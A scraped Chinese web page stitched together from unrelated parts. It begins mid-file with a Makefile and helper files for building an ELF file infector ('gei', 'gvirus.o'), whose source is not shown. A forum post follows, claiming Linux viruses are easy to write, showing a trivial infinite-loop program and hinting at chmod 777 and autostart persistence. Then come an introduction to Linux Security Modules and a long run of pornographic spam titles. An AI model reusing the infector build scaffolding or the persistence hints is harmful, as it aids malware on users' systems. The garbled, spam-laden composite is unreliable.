? ? ? ? : "=&c" (d0), "=&D" (d1), "=&S" (d2)
? ? ? ? :"0" (n/4), "q" (n),"1" ((long) to),"2" ((long) from)
? ? ? ? : "memory");
? ? return (to);
}


#endif /* _G2_SYSCALL_ */
------------------------------ gsyscall.h ------------------------------


------------------------------ foo.c ------------------------------
#include?


int main()
{
? ? puts("real elf point");
? ? return 0;
}
------------------------------ foo.c ------------------------------


------------------------------ Makefile ------------------------------
all: foo gei
gei: g-elf-infector.c gvirus.o
? ? gcc -O2 $< gvirus.o -o gei -Wall -DNDEBUG
foo: foo.c
? ? gcc $< -o foo
gvirus.o: gvirus.c
? ? gcc $< -O2 -c -o gvirus.o -fomit-frame-pointer -Wall -DNDEBUG
clean:
? ? rm *.o -rf
? ? rm foo -rf
? ? rm gei -rf


?基予Ubuntu Linux病毒可能的探討——編寫Linux病毒并不難





一 ?你也可以編一個簡單的病毒


另外linux的殺毒應該算是國外版的,國外起點較早。




很多人認為Linux病毒似乎離我們很遠,但是我現在要說的是,恰恰相反,Linux病毒根本就在我們身邊。而且更容易獲得。


這是一個關于ubuntu麒麟的帖子
http://bbs.kafan.cn/thread-1797636-1-1.html






可以清晰地看出,這個被中國定制版的ubuntu出現了彈窗,而這在以往的linux上是根本看不到的,現在除了ubuntu麒麟外,我尚沒有看到其它版本的linux存在這種情況~(也許我孤陋寡聞,如果哪位飯團發現,請指正)


以下是一個非破壞性病毒的源代碼,它非常簡單,你可以在windows,linux,MAC OS,freeBSD……上編譯看到結果,它的作用就是產生滿屏的混亂。


在ubuntu下你可以使用Geany編譯并運行,其余系統只要有C編譯器即可


#include <stdio.h>
?
int main()
{
? ? ? ? for (;1;)
? ? ? ? ? ? ? ? {
? ? ? ? ? ? ? ? ? ? ? ? printf("*");
? ? ? ? ? ? ? ? }
? ? ? ? return 0;
}






只要編譯運行就會不斷顯示“*”號,滿屏混亂,除非按Break鍵或者拔電源,如果是窗口調試,可以關閉窗口即可。


windows們無須擔心,因為不編譯成EXE是無法運行的。


其它系統也可以編譯運行。


你可以附件傳至樣本區或者自己查殺一下,我保證過所有殺軟。


就是因為這個惡意程序太簡單,但是所有的殺軟都不會認為其是病毒,但是只要稍微修改一下代碼,就可以成為木馬,甚至攻擊利器。


結果是不會自然停止的,學過編程的知道,這是一個死循環(故意的死循環)




這一切都是基于Linux的,而且只要病毒制造者把權限設成anyone,就是chmod 777,那么根本不需要root,所有linux都可以運行(臨時攻擊),如果想開機啟動,只要在某些人的粗心幫助下拷貝到/etc/adg/autostart文件夾即可


注:文中病毒程序并不是真正的病毒,只是一段最簡單的代碼而已,作用是拋磚引玉,并不是教大家真正病毒編寫,否則那就與卡飯的氛圍不符了,再說私自傳播病毒是違法的,在下就是吃了豹子膽也不敢啊~?


相關帖子


基予Ubuntu Linux病毒可能的探討——編寫Linux病毒并不難 小A的Linux版本可不可以殺Windows下的病毒? 問一下,nod32在linux下能清除windows下的病毒么? 病毒知識:病毒奧秘 文件宏病毒和傳統病毒的差異 2010年度報告:是誰在編寫Linux內核? 什么殺毒軟件的病毒庫可查殺的病毒最多 McAfee8.5i+antispy+1月15日最新附加病毒庫+1月14日病毒庫+通用安全規則 可否用論壇提供的病毒庫備份程序作出的病毒庫作為離線更新源 死神病毒降臨 破壞殺毒軟件狂下病毒 卡巴更新完,病毒數量有顯示,但病毒庫沒變化!


二 ? 我為什么寫這些


寫這些的目的當然不是教大家如何炫耀技術,或者用病毒去害人,這恰恰不是我的本意,我的本意是只有人才是關鍵因素,而操作系統不是最關鍵的!


本來Linux以其干凈純潔著稱,但是在某些粗心,圖省事的用戶幫助下,運行病毒簡直易如反掌


安卓就是基于Linux的,這就是前車之鑒。


國內的紅旗Linux就是以KDE為基礎,root用戶為登錄用戶的系統,雖然其曾經吹噓多么安全,但是我很簡單的就把它弄癱瘓了,因為很簡單,本來就是root用戶,密碼又是空的,對系統的修改簡直就是易如反掌,隨心所欲。




我們知道Linux的理念就是認為用戶知道自己在做什么,并且清晰地知道該怎么做,而對于廣大技術小白而言,linux簡直就是病毒的新大陸。只要稍稍誘騙,那么病毒就可以堂而皇之地進入系統,運行起來。


三 ? 我們該怎么辦


正是有了細菌的發現我們才有了抗生素,一味懼怕病毒或者惡意軟件是沒有用的,關鍵就是提高我們的技術實力和防范措施。




現在的ubuntu麒麟只是有個彈窗,以后會不會像酷派那樣安裝后門來推廣還不知道,但這根本不是難事,從技術上說,比在windows下還容易。




所以我們必須知道以下方法


1、了解病毒行為


CIMA和火眼就可以


可以看我的帖子
http://bbs.kafan.cn/thread-968044-1-1.html


2、意識上的防范


這是最重要的,沒有意識上的防范,再安全的系統也是人用的,只要有人就有漏洞。大意和麻痹才是最大的敵人。




3、多學知識,武裝自己


如果你會簡單的C語言,簡單的反匯編,那么不管是Linux還是windows病毒根本就是無所遁形


4、殺毒軟件


卡巴,ESET,賽門鐵克等殺軟均有Linux版本


如何增強 Linux 系統的安全性 -?Linux 安全模塊(LSM)簡介


在安全性方面,Linux內核只提供了經典的UNIX自主訪問控制(root用戶,用戶ID,模式位安全機制),以及部分的支持了POSIX.1e標準草案中的capabilities安全機制,這對于Linux系統的安全性是不足夠的,影響了Linux系統的進一步發展和更廣泛的應用。

有很多安全訪問控制模型和框架已經被研究和開發出來,用以增強Linux系統的安全性,比較知名的有安全增強Linux(SELinux),域和類型增強(DTE),以及Linux入侵檢測系統(LIDS)等等。但是由于沒有一個系統能夠獲得統治性的地位而進入Linux內核成為標準;并且這些系統都大多以各種不同的內核補丁的形式提供,使用這些系統需要有編譯和定制內核的能力,對于沒有內核開發經驗的普通用戶,獲得并使用這些系統是有難度的。在2001年的Linux內核峰會上,美國國家安全局(NSA)介紹了他們關于安全增強Linux(SELinux)的工作,這是一個靈活的訪問控制體系Flask在Linux中的實現,當時Linux內核的創始人Linus Torvalds同意Linux內核確實需要一個通用的安全訪問控制框架,但他指出最好是通過可加載內核模塊的方法,這樣可以支持現存的各種不同的安全訪問控制系統。因此,Linux安全模塊(LSM)應運而生。

Linux安全模塊(LSM)是Linux內核的一個輕量級通用訪問控制框架。它使得各種不同的安全訪問控制模型能夠以Linux可加載內核模塊的形式實現出來,用戶可以根據其需求選擇適合的安全模塊加載到Linux內核中,從而大大提高了Linux安全訪問控制機制的靈活性和易用性。目前已經有很多著名的增強訪問控制系統移植到Linux安全模塊(LSM)上實現,包括POSIX.1e capabilities,安全增強Linux(SELinux),域和類型增強(DTE),以及Linux入侵檢測系統(LIDS)等等。雖然目前Linux安全模塊(LSM)仍然是作為一個Linux內核補丁的形式提供,但是其同時提供Linux 2.4穩定版本的系列和Linux 2.5開發版本的系列,并且很有希望進入Linux 2.6穩定版本,進而實現其目標:被Linux內核接受成為Linux內核安全機制的標準,在各個Linux發行版中提供給用戶使用。

Linux安全模塊(LSM)目前作為一個Linux內核補丁的形式實現。

其主要在五個方面對Linux內核進行了修改:
在特定的內核數據結構中加入了安全域
在內核源代碼中不同的關鍵點插入了對安全鉤子函數的調用
加入了一個通用的安全系統調用
提供了函數允許內核模塊注冊為安全模塊或者注銷
將capabilities邏輯的大部分移植為一個可選的安全模塊


總結

以上是生活随笔為你收集整理的Linux安全编程的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

漂亮人妻洗澡被公强 日日躁 | 国产精品无码永久免费888 | 国产精品二区一区二区aⅴ污介绍 | 日本成熟视频免费视频 | 国产精品美女久久久网av | 丰满少妇高潮惨叫视频 | 亚洲欧洲日本无在线码 | 国产精品久久精品三级 | 波多野结衣aⅴ在线 | 亚洲综合精品香蕉久久网 | 99久久精品国产一区二区蜜芽 | 午夜福利试看120秒体验区 | 日本精品久久久久中文字幕 | 大地资源网第二页免费观看 | 国产亚洲精品久久久闺蜜 | 久久人人爽人人爽人人片av高清 | 国产精品二区一区二区aⅴ污介绍 | 精品久久8x国产免费观看 | 麻豆国产97在线 | 欧洲 | 亚洲色欲色欲欲www在线 | 成人毛片一区二区 | 中文字幕精品av一区二区五区 | 精品人人妻人人澡人人爽人人 | 精品一区二区三区无码免费视频 | 国产精品美女久久久 | 曰韩无码二三区中文字幕 | 又湿又紧又大又爽a视频国产 | 国产成人综合在线女婷五月99播放 | 综合网日日天干夜夜久久 | 久久久久久久人妻无码中文字幕爆 | 青草视频在线播放 | 麻豆人妻少妇精品无码专区 | 亚洲中文字幕无码中字 | 精品久久综合1区2区3区激情 | 特大黑人娇小亚洲女 | 18黄暴禁片在线观看 | 日日麻批免费40分钟无码 | 久久伊人色av天堂九九小黄鸭 | 亚洲最大成人网站 | 伊人色综合久久天天小片 | 亚无码乱人伦一区二区 | 国产午夜无码视频在线观看 | 黑人粗大猛烈进出高潮视频 | 99视频精品全部免费免费观看 | 国产亚洲人成在线播放 | 欧洲熟妇色 欧美 | 性生交大片免费看l | 蜜桃av蜜臀av色欲av麻 999久久久国产精品消防器材 | 精品无码一区二区三区爱欲 | 水蜜桃亚洲一二三四在线 | 日日麻批免费40分钟无码 | 99久久久无码国产精品免费 | 狂野欧美性猛交免费视频 | 久久天天躁夜夜躁狠狠 | 中文字幕无码日韩欧毛 | 国产精品人人爽人人做我的可爱 | 少妇的肉体aa片免费 | 99久久精品日本一区二区免费 | 久久久国产精品无码免费专区 | 亚洲中文字幕va福利 | 色综合久久久久综合一本到桃花网 | 小鲜肉自慰网站xnxx | 久久国产劲爆∧v内射 | 国产猛烈高潮尖叫视频免费 | 无码av岛国片在线播放 | 未满小14洗澡无码视频网站 | 欧美性生交活xxxxxdddd | 色诱久久久久综合网ywww | 野狼第一精品社区 | 日本一本二本三区免费 | 久久久久久久人妻无码中文字幕爆 | 人人超人人超碰超国产 | 国产乱人伦av在线无码 | 大胆欧美熟妇xx | 日本高清一区免费中文视频 | 牲欲强的熟妇农村老妇女 | 国产午夜亚洲精品不卡下载 | 麻豆成人精品国产免费 | 欧美35页视频在线观看 | 少妇性荡欲午夜性开放视频剧场 | 亚洲综合色区中文字幕 | 我要看www免费看插插视频 | 波多野42部无码喷潮在线 | 夜夜高潮次次欢爽av女 | 任你躁国产自任一区二区三区 | 狠狠噜狠狠狠狠丁香五月 | 欧美黑人乱大交 | 鲁鲁鲁爽爽爽在线视频观看 | 精品 日韩 国产 欧美 视频 | 亚洲国产欧美日韩精品一区二区三区 | 久久久久久久久蜜桃 | 在线看片无码永久免费视频 | 丰满岳乱妇在线观看中字无码 | 婷婷五月综合激情中文字幕 | 免费观看的无遮挡av | 人人妻人人澡人人爽欧美一区九九 | 国产免费久久精品国产传媒 | 久久国产自偷自偷免费一区调 | 亚洲理论电影在线观看 | 久久国产精品_国产精品 | 中文字幕av日韩精品一区二区 | 少妇无码一区二区二三区 | 波多野结衣高清一区二区三区 | 色综合久久久无码中文字幕 | 国产色在线 | 国产 | 精品国产aⅴ无码一区二区 | 中文字幕乱码中文乱码51精品 | 久久久无码中文字幕久... | 人人澡人人妻人人爽人人蜜桃 | 一个人看的视频www在线 | 精品国产一区二区三区av 性色 | 激情爆乳一区二区三区 | 国产艳妇av在线观看果冻传媒 | 丰满人妻被黑人猛烈进入 | 四虎国产精品免费久久 | 精品水蜜桃久久久久久久 | 国产在线精品一区二区三区直播 | 色综合久久网 | 无码吃奶揉捏奶头高潮视频 | 性欧美videos高清精品 | 麻豆人妻少妇精品无码专区 | 亚洲爆乳无码专区 | 四十如虎的丰满熟妇啪啪 | 日本xxxx色视频在线观看免费 | 中文字幕无码视频专区 | 欧美成人午夜精品久久久 | 国产绳艺sm调教室论坛 | 国产激情无码一区二区 | 2020久久香蕉国产线看观看 | 亚洲伊人久久精品影院 | 国产亚洲人成a在线v网站 | 精品国产国产综合精品 | 亚洲の无码国产の无码步美 | 97无码免费人妻超级碰碰夜夜 | 成人精品天堂一区二区三区 | 免费看少妇作爱视频 | 成人免费视频在线观看 | 无码人妻久久一区二区三区不卡 | 亚洲国产精品成人久久蜜臀 | 色综合天天综合狠狠爱 | 精品久久久无码中文字幕 | 伦伦影院午夜理论片 | 日产精品高潮呻吟av久久 | 国内精品九九久久久精品 | 激情亚洲一区国产精品 | 久久久国产精品无码免费专区 | 国产97人人超碰caoprom | 日韩欧美中文字幕公布 | 无码人妻少妇伦在线电影 | 成人性做爰aaa片免费看 | 精品久久久久久人妻无码中文字幕 | 国产手机在线αⅴ片无码观看 | 夜先锋av资源网站 | 未满成年国产在线观看 | 爆乳一区二区三区无码 | 成年女人永久免费看片 | 东京热男人av天堂 | 日韩av无码中文无码电影 | www国产精品内射老师 | 无码国产乱人伦偷精品视频 | 日韩视频 中文字幕 视频一区 | 国产在线精品一区二区高清不卡 | 正在播放东北夫妻内射 | 97夜夜澡人人双人人人喊 | 天海翼激烈高潮到腰振不止 | 男女猛烈xx00免费视频试看 | 色诱久久久久综合网ywww | 成人一区二区免费视频 | 99久久精品无码一区二区毛片 | 久久精品国产一区二区三区肥胖 | 亚洲欧美日韩国产精品一区二区 | 亚洲欧美国产精品久久 | 国产av一区二区三区最新精品 | 国产国产精品人在线视 | 国内少妇偷人精品视频 | 樱花草在线社区www | 中文字幕人妻无码一夲道 | 国产精品爱久久久久久久 | 国产成人精品三级麻豆 | 最新国产麻豆aⅴ精品无码 | 无码播放一区二区三区 | 亚洲一区二区三区香蕉 | 亚洲欧美日韩成人高清在线一区 | 波多野结衣av一区二区全免费观看 | 人妻少妇精品无码专区二区 | 中文字幕无线码免费人妻 | 无码任你躁久久久久久久 | 久久久久成人片免费观看蜜芽 | 国产激情精品一区二区三区 | 成人无码精品1区2区3区免费看 | 日本免费一区二区三区最新 | 欧美怡红院免费全部视频 | aⅴ亚洲 日韩 色 图网站 播放 | 亚洲色成人中文字幕网站 | 丰满人妻翻云覆雨呻吟视频 | 亚洲乱码中文字幕在线 | 国产极品美女高潮无套在线观看 | 久久国产精品偷任你爽任你 | 一本无码人妻在中文字幕免费 | 久久无码中文字幕免费影院蜜桃 | 网友自拍区视频精品 | 国产成人一区二区三区别 | 中文字幕人妻丝袜二区 | 一二三四社区在线中文视频 | 中文字幕精品av一区二区五区 | 国产精品高潮呻吟av久久4虎 | 久久久婷婷五月亚洲97号色 | av无码电影一区二区三区 | 精品乱子伦一区二区三区 | 国产午夜无码视频在线观看 | 中文字幕日韩精品一区二区三区 | 鲁大师影院在线观看 | 精品一区二区不卡无码av | 成在人线av无码免费 | 欧美 丝袜 自拍 制服 另类 | 久久久www成人免费毛片 | 亚洲成av人影院在线观看 | 欧美日韩综合一区二区三区 | 日本成熟视频免费视频 | 成人性做爰aaa片免费看 | 男女作爱免费网站 | 国产明星裸体无码xxxx视频 | 日韩人妻无码一区二区三区久久99 | 乱人伦中文视频在线观看 | 久久精品国产大片免费观看 | 乱人伦人妻中文字幕无码久久网 | 少妇无码一区二区二三区 | 欧美猛少妇色xxxxx | 日日噜噜噜噜夜夜爽亚洲精品 | 欧美阿v高清资源不卡在线播放 | 无码人妻久久一区二区三区不卡 | 无码国内精品人妻少妇 | 少妇无码一区二区二三区 | 亚洲综合伊人久久大杳蕉 | 成熟妇人a片免费看网站 | 日本丰满护士爆乳xxxx | 亚洲综合精品香蕉久久网 | 又黄又爽又色的视频 | 欧美人与善在线com | 欧美精品在线观看 | 久久久久久久女国产乱让韩 | 东京一本一道一二三区 | 日产精品99久久久久久 | 国产无遮挡又黄又爽免费视频 | 国产精品国产三级国产专播 | 狠狠色丁香久久婷婷综合五月 | 麻豆av传媒蜜桃天美传媒 | 国产美女精品一区二区三区 | 国产区女主播在线观看 | 亚洲va欧美va天堂v国产综合 | 久久国产精品萌白酱免费 | 亚洲国产精品久久久久久 | 无码任你躁久久久久久久 | 99精品国产综合久久久久五月天 | 亚洲一区二区三区偷拍女厕 | 网友自拍区视频精品 | 强奷人妻日本中文字幕 | 久久综合网欧美色妞网 | 成人亚洲精品久久久久 | 精品国产一区av天美传媒 | 国产av无码专区亚洲a∨毛片 | 国产成人无码av在线影院 | 波多野结衣乳巨码无在线观看 | 亚洲aⅴ无码成人网站国产app | 东北女人啪啪对白 | 国产精品高潮呻吟av久久 | 蜜桃臀无码内射一区二区三区 | 玩弄中年熟妇正在播放 | 伊人久久大香线蕉av一区二区 | 狠狠综合久久久久综合网 | 欧洲vodafone精品性 | 亚洲综合伊人久久大杳蕉 | 免费无码肉片在线观看 | 99麻豆久久久国产精品免费 | 欧洲美熟女乱又伦 | 久久久久se色偷偷亚洲精品av | 国产亚洲精品久久久久久国模美 | 亚洲熟妇色xxxxx欧美老妇 | 久久久久成人精品免费播放动漫 | 国产亚av手机在线观看 | 四十如虎的丰满熟妇啪啪 | 天天做天天爱天天爽综合网 | 国产偷国产偷精品高清尤物 | 99riav国产精品视频 | 最近的中文字幕在线看视频 | 亚洲中文字幕va福利 | 97精品国产97久久久久久免费 | 国产精品亚洲综合色区韩国 | 无码av最新清无码专区吞精 | 国产亚洲人成a在线v网站 | 少妇久久久久久人妻无码 | 国产精品国产三级国产专播 | 久久午夜无码鲁丝片午夜精品 | 丰满岳乱妇在线观看中字无码 | 中文亚洲成a人片在线观看 | 国产熟妇另类久久久久 | 国产麻豆精品精东影业av网站 | 久久久久久亚洲精品a片成人 | 真人与拘做受免费视频一 | 国产乱人伦av在线无码 | 99久久久无码国产精品免费 | 少妇人妻大乳在线视频 | 国产亚洲日韩欧美另类第八页 | 狠狠色噜噜狠狠狠7777奇米 | 亚洲の无码国产の无码步美 | 97无码免费人妻超级碰碰夜夜 | 真人与拘做受免费视频 | 99久久精品国产一区二区蜜芽 | 亚洲国产欧美国产综合一区 | 国产电影无码午夜在线播放 | 亚洲精品一区二区三区在线观看 | 国产精品亚洲综合色区韩国 | 国产精品美女久久久 | 久久精品99久久香蕉国产色戒 | 亚洲成av人片天堂网无码】 | 大地资源中文第3页 | 波多野结衣av一区二区全免费观看 | 久久精品视频在线看15 | 无码帝国www无码专区色综合 | 露脸叫床粗话东北少妇 | 国产精品久久久午夜夜伦鲁鲁 | 亚洲精品国产品国语在线观看 | 欧美精品在线观看 | 国产激情综合五月久久 | 国产亚洲精品精品国产亚洲综合 | 欧美自拍另类欧美综合图片区 | 一本色道久久综合狠狠躁 | 国产绳艺sm调教室论坛 | 国产熟妇高潮叫床视频播放 | 欧美成人高清在线播放 | 欧美人与动性行为视频 | 中文久久乱码一区二区 | 伊人久久大香线蕉av一区二区 | 色综合久久久无码网中文 | 东北女人啪啪对白 | 久久精品人人做人人综合 | 波多野结衣av一区二区全免费观看 | 中文字幕无线码免费人妻 | 精品人妻人人做人人爽夜夜爽 | 免费看少妇作爱视频 | 国产精品无码久久av | 国产成人久久精品流白浆 | 秋霞成人午夜鲁丝一区二区三区 | 性生交大片免费看l | 最新国产乱人伦偷精品免费网站 | 强辱丰满人妻hd中文字幕 | 久久国语露脸国产精品电影 | 无码精品国产va在线观看dvd | 2020久久超碰国产精品最新 | 无码免费一区二区三区 | 男人的天堂av网站 | 少妇性l交大片欧洲热妇乱xxx | 久久亚洲a片com人成 | 国产精品a成v人在线播放 | 国产无av码在线观看 | 在线看片无码永久免费视频 | 日本一卡2卡3卡4卡无卡免费网站 国产一区二区三区影院 | 无码人妻出轨黑人中文字幕 | 久久aⅴ免费观看 | 精品厕所偷拍各类美女tp嘘嘘 | 久久综合香蕉国产蜜臀av | 精品国产一区二区三区av 性色 | 人妻中文无码久热丝袜 | 免费人成网站视频在线观看 | 国产精品18久久久久久麻辣 | 亚洲国产成人av在线观看 | 欧美性生交活xxxxxdddd | 99久久久国产精品无码免费 | 欧美亚洲国产一区二区三区 | 国产精品国产三级国产专播 | 久久综合狠狠综合久久综合88 | 国产精品久久精品三级 | 岛国片人妻三上悠亚 | 少妇高潮一区二区三区99 | 四十如虎的丰满熟妇啪啪 | 无码国内精品人妻少妇 | 国产精品美女久久久久av爽李琼 | 国产高清不卡无码视频 | 欧美人与牲动交xxxx | 天天燥日日燥 | 国内精品人妻无码久久久影院 | 少妇厨房愉情理9仑片视频 | 中文字幕乱妇无码av在线 | 免费中文字幕日韩欧美 | 伊人久久婷婷五月综合97色 | 国产精品久久久久久久影院 | 中文字幕 亚洲精品 第1页 | 色狠狠av一区二区三区 | 亚洲成av人在线观看网址 | 荫蒂被男人添的好舒服爽免费视频 | 九九热爱视频精品 | 免费男性肉肉影院 | 无码人妻久久一区二区三区不卡 | 国产精品-区区久久久狼 | 日韩人妻无码一区二区三区久久99 | 国产午夜无码视频在线观看 | 亚洲综合无码久久精品综合 | 亚洲中文字幕无码一久久区 | 亚洲一区二区三区播放 | 亚洲熟女一区二区三区 | 久久久国产精品无码免费专区 | 国产猛烈高潮尖叫视频免费 | 人人妻人人澡人人爽精品欧美 | 亚洲国产欧美在线成人 | www一区二区www免费 | 国产精品欧美成人 | 国产精品久久国产精品99 | 亚洲欧美日韩综合久久久 | 日本精品少妇一区二区三区 | 久久99久久99精品中文字幕 | 日本精品久久久久中文字幕 | 久久精品国产大片免费观看 | 国产美女极度色诱视频www | 少妇被黑人到高潮喷出白浆 | 亚洲精品无码国产 | 亚洲综合色区中文字幕 | 日韩精品无码免费一区二区三区 | 午夜精品久久久内射近拍高清 | 色偷偷人人澡人人爽人人模 | 帮老师解开蕾丝奶罩吸乳网站 | 在线播放无码字幕亚洲 | 久久久中文久久久无码 | 黄网在线观看免费网站 | 97久久国产亚洲精品超碰热 | 国产人妻人伦精品1国产丝袜 | 久久精品中文字幕一区 | 亚洲人成影院在线无码按摩店 | 亚洲欧美精品伊人久久 | 久久国产精品精品国产色婷婷 | 无码av最新清无码专区吞精 | 国产av无码专区亚洲a∨毛片 | 又粗又大又硬毛片免费看 | 成人免费视频视频在线观看 免费 | 亚洲の无码国产の无码步美 | 色诱久久久久综合网ywww | 亚洲精品久久久久中文第一幕 | 亚洲国产综合无码一区 | 婷婷丁香五月天综合东京热 | 国产另类ts人妖一区二区 | 国产精品福利视频导航 | 国产精品多人p群无码 | 欧美成人免费全部网站 | 亚洲自偷自拍另类第1页 | 人妻体内射精一区二区三四 | 中文字幕日韩精品一区二区三区 | 天天躁日日躁狠狠躁免费麻豆 | 性生交大片免费看女人按摩摩 | 亚洲日韩乱码中文无码蜜桃臀网站 | 免费人成网站视频在线观看 | 丰满岳乱妇在线观看中字无码 | 日韩av无码一区二区三区不卡 | 国产性猛交╳xxx乱大交 国产精品久久久久久无码 欧洲欧美人成视频在线 | 中文字幕无码免费久久99 | 精品成在人线av无码免费看 | 熟妇人妻无码xxx视频 | 97久久国产亚洲精品超碰热 | 亚洲小说春色综合另类 | 国产精品久久久久久无码 | 亚洲aⅴ无码成人网站国产app | 日韩 欧美 动漫 国产 制服 | 国模大胆一区二区三区 | 高清不卡一区二区三区 | 人妻aⅴ无码一区二区三区 | 国产乱子伦视频在线播放 | 国产成人精品久久亚洲高清不卡 | 牲交欧美兽交欧美 | 中文字幕乱码人妻无码久久 | 少女韩国电视剧在线观看完整 | 两性色午夜视频免费播放 | 成年美女黄网站色大免费全看 | 少妇厨房愉情理9仑片视频 | 国产xxx69麻豆国语对白 | 亚洲综合伊人久久大杳蕉 | 丰满人妻精品国产99aⅴ | 亚洲国产一区二区三区在线观看 | 大肉大捧一进一出视频出来呀 | 亚洲精品欧美二区三区中文字幕 | 亚洲日韩av一区二区三区中文 | 东京热无码av男人的天堂 | 欧美怡红院免费全部视频 | 丰满肥臀大屁股熟妇激情视频 | 99久久人妻精品免费二区 | 红桃av一区二区三区在线无码av | 亚洲国产高清在线观看视频 | 性欧美大战久久久久久久 | 国产欧美熟妇另类久久久 | 精品国偷自产在线 | 丰满人妻精品国产99aⅴ | 东京热无码av男人的天堂 | 亚洲中文字幕va福利 | 亚洲综合无码久久精品综合 | 精品人妻人人做人人爽 | 免费男性肉肉影院 | 精品无码一区二区三区的天堂 | 国产无套内射久久久国产 | 国产真实夫妇视频 | 精品国精品国产自在久国产87 | 日本饥渴人妻欲求不满 | 久久 国产 尿 小便 嘘嘘 | 少女韩国电视剧在线观看完整 | 永久免费观看美女裸体的网站 | 又大又硬又黄的免费视频 | 亚洲狠狠色丁香婷婷综合 | 亚洲第一无码av无码专区 | 1000部啪啪未满十八勿入下载 | 亚拍精品一区二区三区探花 | 欧美 日韩 亚洲 在线 | 国产精品久久久久久亚洲影视内衣 | 国产香蕉97碰碰久久人人 | 色综合天天综合狠狠爱 | 1000部啪啪未满十八勿入下载 | 久久国产精品精品国产色婷婷 | 亚洲欧美精品aaaaaa片 | 久久99精品国产麻豆蜜芽 | 亚洲人成网站色7799 | 国产精品高潮呻吟av久久 | 亚洲成av人在线观看网址 | 久9re热视频这里只有精品 | 兔费看少妇性l交大片免费 | 久久熟妇人妻午夜寂寞影院 | 欧美第一黄网免费网站 | 国产精品亚洲一区二区三区喷水 | 九九久久精品国产免费看小说 | 一个人看的视频www在线 | 欧美35页视频在线观看 | 青草视频在线播放 | 久久久久成人片免费观看蜜芽 | 又大又硬又黄的免费视频 | 国产精品人人爽人人做我的可爱 | 亚洲gv猛男gv无码男同 | 中文字幕无码视频专区 | 大地资源网第二页免费观看 | 国产亚洲精品久久久久久久 | 欧美猛少妇色xxxxx | 红桃av一区二区三区在线无码av | 国产午夜视频在线观看 | 国产激情一区二区三区 | 久久无码中文字幕免费影院蜜桃 | 国产三级久久久精品麻豆三级 | 天天拍夜夜添久久精品大 | 国产网红无码精品视频 | 成熟女人特级毛片www免费 | 久久天天躁狠狠躁夜夜免费观看 | 美女扒开屁股让男人桶 | 久久综合久久自在自线精品自 | 无码免费一区二区三区 | 日本精品人妻无码免费大全 | 粗大的内捧猛烈进出视频 | 正在播放老肥熟妇露脸 | 亚洲色无码一区二区三区 | 欧美老人巨大xxxx做受 | 久久国产劲爆∧v内射 | 丰满人妻一区二区三区免费视频 | 天堂一区人妻无码 | 亚洲午夜久久久影院 | 国产精品va在线观看无码 | 亚洲 另类 在线 欧美 制服 | 无码中文字幕色专区 | 国产九九九九九九九a片 | 免费观看激色视频网站 | 中文字幕无码人妻少妇免费 | 国产亚洲精品久久久久久 | 荫蒂添的好舒服视频囗交 | 丁香花在线影院观看在线播放 | 日本xxxx色视频在线观看免费 | av无码久久久久不卡免费网站 | 青青久在线视频免费观看 | 国产激情精品一区二区三区 | 又黄又爽又色的视频 | 亚洲男人av天堂午夜在 | 亚洲中文字幕在线无码一区二区 | 中文字幕+乱码+中文字幕一区 | 日韩精品一区二区av在线 | 无码中文字幕色专区 | 日本护士毛茸茸高潮 | 精品欧洲av无码一区二区三区 | 激情内射日本一区二区三区 | 人妻尝试又大又粗久久 | 蜜臀av在线播放 久久综合激激的五月天 | 国产片av国语在线观看 | 精品欧美一区二区三区久久久 | 日产精品高潮呻吟av久久 | 欧美xxxx黑人又粗又长 | 欧美老妇交乱视频在线观看 | 国产精品久久精品三级 | 性欧美熟妇videofreesex | v一区无码内射国产 | 日韩精品成人一区二区三区 | 日本www一道久久久免费榴莲 | 欧美亚洲日韩国产人成在线播放 | 天堂а√在线地址中文在线 | 国模大胆一区二区三区 | 成人欧美一区二区三区黑人免费 | 亚洲欧洲日本综合aⅴ在线 | 亚洲国产成人a精品不卡在线 | 女人被男人爽到呻吟的视频 | 久久婷婷五月综合色国产香蕉 | 亚洲第一网站男人都懂 | 亚洲一区二区三区在线观看网站 | 啦啦啦www在线观看免费视频 | 美女黄网站人色视频免费国产 | 欧美午夜特黄aaaaaa片 | 婷婷综合久久中文字幕蜜桃三电影 | 97无码免费人妻超级碰碰夜夜 | 国产精品久久久久影院嫩草 | 日欧一片内射va在线影院 | 国产亚洲精品久久久久久久 | 国产av无码专区亚洲awww | 久久五月精品中文字幕 | 人妻少妇精品无码专区动漫 | 丰腴饱满的极品熟妇 | 对白脏话肉麻粗话av | 狠狠综合久久久久综合网 | 欧美兽交xxxx×视频 | 国产亚洲精品精品国产亚洲综合 | 欧美丰满老熟妇xxxxx性 | 亚洲成在人网站无码天堂 | 国产精品久免费的黄网站 | 日日天日日夜日日摸 | 国产亚洲精品久久久久久大师 | 国产精品怡红院永久免费 | 欧洲熟妇色 欧美 | 中文字幕人妻无码一夲道 | 亚洲精品久久久久久一区二区 | 国产高清av在线播放 | 色欲人妻aaaaaaa无码 | 亚洲s码欧洲m码国产av | 97精品国产97久久久久久免费 | 激情综合激情五月俺也去 | 秋霞特色aa大片 | 精品久久久久久亚洲精品 | 国产精品无码永久免费888 | 亚洲精品成a人在线观看 | 国产午夜无码精品免费看 | 四虎国产精品一区二区 | 婷婷综合久久中文字幕蜜桃三电影 | 国产精品久久久久影院嫩草 | 狠狠色丁香久久婷婷综合五月 | 色婷婷香蕉在线一区二区 | 又大又紧又粉嫩18p少妇 | 亚洲а∨天堂久久精品2021 | 亚洲欧美色中文字幕在线 | 国产av人人夜夜澡人人爽麻豆 | 欧美激情综合亚洲一二区 | 欧美成人高清在线播放 | 精品国偷自产在线 | 少妇高潮一区二区三区99 | 日本一区二区更新不卡 | 成人无码精品一区二区三区 | 免费无码一区二区三区蜜桃大 | 亚洲 另类 在线 欧美 制服 | 亚洲一区二区三区香蕉 | 成人亚洲精品久久久久软件 | av无码不卡在线观看免费 | 荫蒂添的好舒服视频囗交 | 国产成人综合美国十次 | 99riav国产精品视频 | 欧美黑人巨大xxxxx | 内射老妇bbwx0c0ck | 一本久久a久久精品亚洲 | 亚洲精品中文字幕 | 99精品国产综合久久久久五月天 | 在线观看免费人成视频 | 少妇被黑人到高潮喷出白浆 | 欧洲美熟女乱又伦 | 久青草影院在线观看国产 | 亚洲精品午夜国产va久久成人 | 亚洲成av人片在线观看无码不卡 | 秋霞成人午夜鲁丝一区二区三区 | 一本一道久久综合久久 | 天堂а√在线地址中文在线 | 免费视频欧美无人区码 | 精品无码成人片一区二区98 | 婷婷综合久久中文字幕蜜桃三电影 | 